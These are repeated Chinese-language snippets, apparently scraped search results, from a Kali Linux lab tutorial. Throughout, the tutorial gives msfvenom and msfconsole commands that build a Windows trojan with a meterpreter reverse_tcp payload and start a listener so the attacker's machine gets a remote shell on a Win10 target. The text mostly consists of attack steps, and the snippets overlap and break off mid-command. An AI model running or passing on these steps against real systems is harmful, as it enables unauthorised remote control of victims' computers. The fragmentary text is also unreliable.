这个就是Kali主机的IP地址 接下来运行命令生成木马 默认生成的文件在根目录下 把刚才生成的文件放到目标靶机Win10系统中 3.运行msfconsole命令 命令:msfconsole 4.配置参数 (1)命令:use exploit/multi/handler(选择模块) (2)命令:set payload windows/meterpreter/reverse_tcp(选择攻击模块) (3)命令:set LhOST 19...
提示:这个就是Kali主机的IP地址 接下来运行命令生成木马 默认生成的文件在根目录下 把刚才生成的文件放到目标靶机Win10系统中 3.运行msfconsole命令 命令: msfconsole 4.配置参数 (1)命令: use exploit/multi/handler (选择模块) (2)命令:set payload windows/meterpreter/ reverse_tcp(选择攻击模块) (3)命令: ...
2. 渗透流程 首先,以管理员权限运行命令:sudo su,确保权限充足。 生成木马文件:msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的Kali IP LPORT=你选择的端口 -f exe -o .exe,将文件放到目标Win10系统。 在msfconsole中配置:use exploit/multi/handler,set payload windows/meterprete...
这个就是Kali主机的IP地址 接下来运行命令生成木马 默认生成的文件在根目录下 把刚才生成的文件放到目标靶机Win10系统中 3.运行msfconsole命令 命令:msfconsole 4.配置参数 (1)命令:use exploit/multi/handler(选择模块) (2)命令:set payload windows/meterpreter/reverse_tcp(选择攻击模块) (3)命令:set LhOST 19...
软件:msfvenom、msfconsole(Kali系统内置) 02 渗透流程 1.进入管理员模式 命令: sudo su 解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令 提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可 ...
这个就是Kali主机的IP地址 接下来运行命令生成木马 默认生成的文件在根目录下 把刚才生成的文件放到目标靶机Win10系统中 3.运行msfconsole命令 命令:msfconsole 4.配置参数 (1)命令:use exploit/multi/handler(选择模块) (2)命令:set payload windows/meterpreter/reverse_tcp(选择攻击模块) ...